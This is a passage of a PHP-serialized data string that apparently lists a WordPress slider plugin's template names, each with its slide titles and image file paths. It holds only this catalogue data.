3\";s:3:\"img\";s:24:\"betteryoutube/slide3.jpg\";}}s:19:\"agencywebsiteheader\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"agencywebsiteheader/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:30:\"agencywebsiteheader/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:30:\"agencywebsiteheader/slide3.jpg\";}}s:10:\"comingsoon\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"comingsoon/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:21:\"comingsoon/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:21:\"comingsoon/slide3.jpg\";}}s:9:\"snowscene\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:20:\"snowscene/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:20:\"snowscene/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:20:\"snowscene/slide3.jpg\";}}s:8:\"rockband\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:19:\"rockband/slide1.jpg\";}}s:16:\"sleeklandingpage\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"sleeklandingpage/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"sleeklandingpage/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:27:\"sleeklandingpage/slide3.jpg\";}}s:14:\"applandingpage\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"applandingpage/slide1.jpg\";}}s:9:\"deskscene\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:20:\"deskscene/slide1.jpg\";}}s:15:\"cleannewsslider\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"cleannewsslider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"cleannewsslider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"cleannewsslider/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:26:\"cleannewsslider/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:26:\"cleannewsslider/slide5.jpg\";}}s:12:\"imagegallery\";a:8:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"imagegallery/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:23:\"imagegallery/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:23:\"imagegallery/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:23:\"imagegallery/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:23:\"imagegallery/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:23:\"imagegallery/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:23:\"imagegallery/slide7.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:23:\"imagegallery/slide8.jpg\";}}s:19:\"standard-wp-gallery\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"standard-wp-gallery/slide1.jpg\";}}s:21:\"clean-news-post-based\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"clean-news-post-based/slide1.jpg\";}}s:21:\"interactivewhiteboard\";a:8:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"interactivewhiteboard/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:32:\"interactivewhiteboard/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:32:\"interactivewhiteboard/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:32:\"interactivewhiteboard/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:32:\"interactivewhiteboard/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:32:\"interactivewhiteboard/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:32:\"interactivewhiteboard/slide7.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:32:\"interactivewhiteboard/slide8.jpg\";}}s:10:\"innovation\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"innovation/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:21:\"innovation/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:21:\"innovation/slide3.jpg\";}}s:24:\"dark-fullsite-block-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"dark-fullsite-block-menu/slide1.jpg\";}}s:21:\"dark-fullsite-block-1\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"dark-fullsite-block-1/slide1.jpg\";}}s:27:\"dark-fullsite-block-2-about\";a:2:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"dark-fullsite-block-2-about/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:38:\"dark-fullsite-block-2-about/slide2.jpg\";}}s:30:\"dark-fullsite-block-3-services\";a:2:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:41:\"dark-fullsite-block-3-services/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:41:\"dark-fullsite-block-3-services/slide2.jpg\";}}s:30:\"dark-fullsite-block-4-products\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:41:\"dark-fullsite-block-4-products/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:41:\"dark-fullsite-block-4-products/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:41:\"dark-fullsite-block-4-products/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:41:\"dark-fullsite-block-4-products/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:41:\"dark-fullsite-block-4-products/slide5.jpg\";}}s:34:\"dark-fullsite-block-5-testimonials\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:45:\"dark-fullsite-block-5-testimonials/slide1.jpg\";}}s:29:\"dark-fullsite-block-6-callout\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:40:\"dark-fullsite-block-6-callout/slide1.jpg\";}}s:28:\"dark-fullsite-block-7-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:39:\"dark-fullsite-block-7-footer/slide1.jpg\";}}s:19:\"fullsite-block-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"fullsite-block-menu/slide1.jpg\";}}s:15:\"fullsite-block1\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"fullsite-block1/slide1.jpg\";}}s:22:\"fullsite-block-2-about\";a:2:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"fullsite-block-2-about/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:33:\"fullsite-block-2-about/slide2.jpg\";}}s:25:\"fullsite-block-3-services\";a:2:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:36:\"fullsite-block-3-services/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:36:\"fullsite-block-3-services/slide2.jpg\";}}s:25:\"fullsite-block-4-products\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:36:\"fullsite-block-4-products/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:36:\"fullsite-block-4-products/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:36:\"fullsite-block-4-products/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:36:\"fullsite-block-4-products/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:36:\"fullsite-block-4-products/slide5.jpg\";}}s:29:\"fullsite-block-5-testimonials\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:40:\"fullsite-block-5-testimonials/slide1.jpg\";}}s:24:\"fullsite-block-6-callout\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"fullsite-block-6-callout/slide1.jpg\";}}s:23:\"fullsite-block-7-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"fullsite-block-7-footer/slide1.jpg\";}}s:11:\"techjournal\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"techjournal/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"techjournal/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"techjournal/slide3.jpg\";}}s:13:\"cardealership\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"cardealership/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"cardealership/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:24:\"cardealership/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:24:\"cardealership/slide4.jpg\";}}s:14:\"fullscreenmenu\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"fullscreenmenu/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"fullscreenmenu/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"fullscreenmenu/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:25:\"fullscreenmenu/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:25:\"fullscreenmenu/slide5.jpg\";}}s:17:\"creativefrontpage\";a:8:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"creativefrontpage/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"creativefrontpage/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"creativefrontpage/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:28:\"creativefrontpage/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:28:\"creativefrontpage/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:28:\"creativefrontpage/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:28:\"creativefrontpage/slide7.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:28:\"creativefrontpage/slide8.jpg\";}}s:19:\"websitebuilder-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"websitebuilder-menu/slide1.jpg\";}}s:19:\"websitebuilder-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"websitebuilder-hero/slide1.jpg\";}}s:22:\"websitebuilder-clients\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"websitebuilder-clients/slide1.jpg\";}}s:23:\"websitebuilder-services\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"websitebuilder-services/slide1.jpg\";}}s:23:\"websitebuilder-discover\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"websitebuilder-discover/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:34:\"websitebuilder-discover/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:34:\"websitebuilder-discover/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:34:\"websitebuilder-discover/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:34:\"websitebuilder-discover/slide5.jpg\";}}s:21:\"websitebuilder-slider\";a:2:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"websitebuilder-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:32:\"websitebuilder-slider/slide2.jpg\";}}s:27:\"websitebuilder-calltoaction\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"websitebuilder-calltoaction/slide1.jpg\";}}s:21:\"websitebuilder-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"websitebuilder-footer/slide1.jpg\";}}s:13:\"focusparallax\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"focusparallax/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"focusparallax/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:24:\"focusparallax/slide3.jpg\";}}s:7:\"duotone\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:18:\"duotone/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:18:\"duotone/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:18:\"duotone/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:18:\"duotone/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:18:\"duotone/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:18:\"duotone/slide6.jpg\";}}s:6:\"r_menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:17:\"r_menu/slide1.jpg\";}}s:5:\"rhero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:17:\"r_hero/slide1.jpg\";}}s:7:\"r_about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:18:\"r_about/slide1.jpg\";}}s:10:\"r_products\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"r_products/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:21:\"r_products/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:21:\"r_products/slide3.jpg\";}}s:6:\"r_info\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:17:\"r_info/slide1.jpg\";}}s:17:\"inspirationheader\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"inspirationheader/slide1.jpg\";}}s:13:\"magazineposts\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"magazineposts/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"magazineposts/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:24:\"magazineposts/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:24:\"magazineposts/slide4.jpg\";}}s:17:\"explorationheader\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"explorationheader/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"explorationheader/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"explorationheader/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:28:\"explorationheader/slide4.jpg\";}}s:16:\"typewritereffect\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"typewritereffect/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"typewritereffect/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:27:\"typewritereffect/slide3.jpg\";}}s:15:\"blendmodeheader\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"blendmodeheader/slide1.jpg\";}}s:17:\"themeplicity_menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"themeplicity_menu/slide1.jpg\";}}s:19:\"themeplicity_header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"themeplicity_header/slide1.jpg\";}}s:18:\"themeplicity_offer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"themeplicity_offer/slide1.jpg\";}}s:21:\"themeplicity_whatwedo\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"themeplicity_whatwedo/slide1.jpg\";}}s:21:\"themeplicity_projects\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"themeplicity_projects/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:32:\"themeplicity_projects/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:32:\"themeplicity_projects/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:32:\"themeplicity_projects/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:32:\"themeplicity_projects/slide5.jpg\";s:3:\"img\";s:7:\"Slide 5\";}}s:23:\"themeplicity_whatsgreat\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"themeplicity_whatsgreat/slide1.jpg\";}}s:19:\"themeplicity_tables\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"themeplicity_tables/slide1.jpg\";}}s:24:\"themeplicity_contactform\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"themeplicity_contactform/slide1.jpg\";}}s:19:\"themeplicity_footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"themeplicity_footer/slide1.jpg\";}}s:17:\"NiceAndClean_Menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"NiceAndClean_Menu/slide1.jpg\";}}s:19:\"NiceAndClean_Header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"NiceAndClean_Header/slide1.jpg\";}}s:21:\"NiceAndClean_Services\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"NiceAndClean_Services/slide1.jpg\";}}s:18:\"NiceAndClean_About\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"NiceAndClean_About/slide1.jpg\";}}s:18:\"niceandclean_video\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"niceandclean_video/slide1.jpg\";}}s:23:\"niceandclean_highlights\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"niceandclean_highlights/slide1.jpg\";}}s:21:\"NiceAndClean_Projects\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"NiceAndClean_Projects/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:32:\"NiceAndClean_Projects/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:32:\"NiceAndClean_Projects/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:32:\"NiceAndClean_Projects/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:32:\"NiceAndClean_Projects/slide5.jpg\";}}s:23:\"niceandclean_textblocks\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"niceandclean_textblocks/slide1.jpg\";}}s:20:\"niceandclean_callout\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"niceandclean_callout/slide1.jpg\";}}s:19:\"niceandclean_footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"niceandclean_footer/slide1.jpg\";}}s:3:\"80s\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:14:\"80s/slide1.jpg\";}}s:10:\"blurslider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"blurslider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:21:\"blurslider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:21:\"blurslider/slide3.jpg\";}}s:15:\"ComingSoonAddon\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"ComingSoonAddon/slide1.jpg\";}}s:9:\"snowaddon\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:20:\"snowaddon/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:20:\"snowaddon/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:20:\"snowaddon/slide3.jpg\";}}s:19:\"particle-effect-one\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"particle-effect-one/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:30:\"particle-effect-one/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:30:\"particle-effect-one/slide3.jpg\";}}s:19:\"particle-effect-two\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"particle-effect-two/slide1.jpg\";}}s:21:\"particle-effect-three\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"particle-effect-three/slide1.jpg\";}}s:15:\"portfolioviewer\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"portfolioviewer/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"portfolioviewer/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"portfolioviewer/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:26:\"portfolioviewer/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:26:\"portfolioviewer/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:26:\"portfolioviewer/slide6.jpg\";}}s:11:\"appshowcase\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"appshowcase/slide1.jpg\";}}s:13:\"gravitydesign\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"gravitydesign/slide1.jpg\";}}s:12:\"404errorpage\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"404errorpage/slide1.jpg\";}}s:15:\"carouselgallery\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"carouselgallery/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"carouselgallery/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"carouselgallery/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:26:\"carouselgallery/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:26:\"carouselgallery/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:26:\"carouselgallery/slide6.jpg\";}}s:9:\"filmstrip\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:20:\"filmstrip/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:20:\"filmstrip/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:20:\"filmstrip/slide3.jpg\";}}s:10:\"spaceopera\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"spaceopera/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:21:\"spaceopera/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:21:\"spaceopera/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:21:\"spaceopera/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:21:\"spaceopera/slide5.jpg\";}}s:12:\"websiteintro\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"websiteintro/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:23:\"websiteintro/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:23:\"websiteintro/slide3.jpg\";}}s:12:\"maskshowcase\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"maskshowcase/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:23:\"maskshowcase/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:23:\"maskshowcase/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:23:\"maskshowcase/slide4.jpg\";}}s:18:\"parallaxzoomslices\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"parallaxzoomslices/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 